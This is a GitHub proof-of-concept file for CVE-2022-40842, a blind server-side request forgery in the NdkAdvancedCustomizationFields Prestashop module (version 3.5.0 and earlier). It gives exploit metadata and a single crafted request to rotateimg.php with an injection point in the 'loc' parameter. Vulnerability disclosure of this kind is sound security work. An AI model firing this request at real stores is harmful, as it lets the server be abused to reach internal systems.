Headline
CVE-2022-40842: cve-s/poc.txt at main · daaaalllii/cve-s
ndk design NdkAdvancedCustomizationFields 3.5.0 is vulnerable to Server-side request forgery (SSRF) via rotateimg.php.
Permalink
# Exploit Title: NdkAdvancedCustomizationFields Prestashop module <= 3.5.0 blind Server-side request forgery (SSRF)
# Date: 01-11-2022
# Exploit Author: dalii
# Vendor Homepage: https://www.ndk-design.fr/
# Software Link : https://www.ndk-design.fr/documentation-ndkadvancedcustomizationfields-prestashop-english
# Version: 3.5.0
# Tested on: Windows 10
# CVE: CVE-2022-40842
Parameters: loc
Exploit:
http://localhost/modules/ndk_advanced_custom_fields/rotateimg.php?loc={{inject here}&rot=90&top=1000&left=1000&width=1000&height=1000&imgwidth=1000